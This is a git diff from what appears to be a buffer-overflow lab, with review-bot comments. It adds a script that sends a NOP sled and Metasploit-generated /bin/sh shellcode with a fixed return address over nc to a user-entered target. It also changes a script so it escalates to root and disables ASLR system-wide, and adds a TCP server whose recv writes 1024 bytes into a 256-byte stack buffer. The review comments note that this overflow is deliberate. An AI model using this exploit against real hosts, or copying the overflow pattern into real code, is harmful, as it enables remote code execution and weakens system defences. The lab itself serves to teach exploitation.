-rw-r--r-- | .gitignore | 2 | ||||
-rwxr-xr-x | disable_prot.sh | 6 | ||||
-rwxr-xr-x | exploit_tcp.sh | 11 | ||||
-rwxr-xr-x | overflow | bin | 3344 -> 0 bytes | |||
-rw-r--r-- | overflow_tcp.c | 66 |
5 files changed, 84 insertions, 1 deletions
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..bbffc50
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+overflow
+overflow_tcp
diff --git a/disable_prot.sh b/disable_prot.sh
index 16498a3..15e8137 100755
--- a/disable_prot.sh
+++ b/disable_prot.sh
@@ -1,9 +1,13 @@
-#!/bin/sh
+#!/bin/bash
 if [ `id -u` -ne 0 ]; then
 echo "$0: This program should be run as root"
+ echo "$0: Try to get root .."
+ su -l root -c "$(realpath $0)"
+ exit $?
 fi
 sysctl -w kernel.randomize_va_space=0 2>/dev/null
 sysctl -w kernel.exec-shield=0 2>/dev/null
+echo "done."
diff --git a/exploit_tcp.sh b/exploit_tcp.sh
new file mode 100755
index 0000000..4630887
--- /dev/null
+++ b/exploit_tcp.sh
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+# shellcode generated with metasploit (exec /bin/sh):
+# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
+
+# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr
+#[*] Exact match at offset 284
+
+
+read -p "Target: " host
+python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"' | nc -q 0 "$host" 3000
diff --git a/overflow b/overflow
Binary files differ
deleted file mode 100755
index 1879d46..0000000
--- a/overflow
+++ /dev/null
diff --git a/overflow_tcp.c b/overflow_tcp.c
new file mode 100644
index 0000000..cafeaec
--- /dev/null
+++ b/overflow_tcp.c
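Review bot: In disable_prot.sh the new `echo "done."` reports success unconditionally while both `sysctl` calls still discard their errors with `2>/dev/null`, so a failure to lower `kernel.randomize_va_space` (and the expected absence of `kernel.exec-shield` on most current kernels) is never surfaced; print the effective value before "done.", `sysctl kernel.randomize_va_space`, or drop the redirect on the first call and `exit 1` when it fails. The added re-exec line quotes the command substitution but not `$0` inside it, so a checkout path containing spaces breaks; write `su -l root -c "$(realpath "$0")"`. Because this change weakens ASLR for the whole machine and persists until reboot, a header comment saying so and naming the restore command, `sysctl -w kernel.randomize_va_space=2`, would help whoever runs the lab on a shared host.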
@@ -0,0 +1,66 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <netinet/in.h>
+#include <string.h>
+#include <unistd.h>
+#include <signal.h>
+
+#define MAXLINE 1024
+#define BUFLEN 256
+#define SERV_PORT 3000
+#define LISTENQ 8
+
+int main (int argc, char **argv)
+{
+ int listenfd, connfd, n, line = 0, status;
+ pid_t childpid, w;
+ socklen_t clilen;
+ char buf[BUFLEN];
+ struct sockaddr_in cliaddr, servaddr;
+
+ if ((listenfd = socket(AF_INET, SOCK_STREAM, 0)) <0) {
+ perror("socket");
+ exit(1);
+ }
+
+ servaddr.sin_family = AF_INET;
+ servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
+ servaddr.sin_port = htons(SERV_PORT);
+
+ if (bind(listenfd, (struct sockaddr *) &servaddr, sizeof(servaddr)) != 0) {
+ perror("bind");
+ exit(2);
+ }
+ if (listen(listenfd, LISTENQ) != 0) {
+ perror("listen");
+ exit(3);
+ }
+
+ fprintf(stderr, "Server running on port %d ...\n", SERV_PORT);
+ for (;;) {
+ memset(buf, 0, BUFLEN);
+ clilen = sizeof(cliaddr);
+ connfd = accept (listenfd, (struct sockaddr *) &cliaddr, &clilen);
+ if (connfd < 0) break;
+ fprintf(stderr, "Client connected.\n");
+ if ((childpid = fork ()) == 0 ) {
+ while ((n = recv(connfd, buf, MAXLINE,0)) > 0) {
+ fprintf(stderr, "[%d] Received string(%d): %s", line, n, buf);
+ memset(buf, 0, BUFLEN);
+ line++;
+ }
+ exit(1);
+ }
+ if ((w = wait(&status))) {
+ if (WIFEXITED(status)) {
+ kill(w, SIGCHLD);
+ }
+ }
+ }
+
+ close(listenfd);
+ return (0);
+}
|
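Review bot: `recv(connfd, buf, MAXLINE, 0)` accepts up to 1024 bytes into `buf[BUFLEN]`, a 256-byte stack array, and nothing in the file marks this as the deliberate lab defect, so the pattern reads like an ordinary server bug; a comment on that line, `/* INTENTIONAL: recv length (MAXLINE) exceeds sizeof buf - this is the lab target, do not reuse */`, keeps it from being copied into real code. Separately, `servaddr` is never zeroed before `bind`, so its `sin_zero` padding holds whatever was on the stack; declare it as `struct sockaddr_in cliaddr, servaddr = {0};`. The `%s` in the log `fprintf` relies on the preceding `memset` for termination, which already fails for an in-bounds read of exactly `BUFLEN` bytes; `%.*s` with the length clamped to `BUFLEN` keeps the log line well-defined. The parent never closes `connfd` and the child never closes `listenfd`, so descriptors leak across connections, and `kill(w, SIGCHLD)` targets a child that `wait` has already reaped.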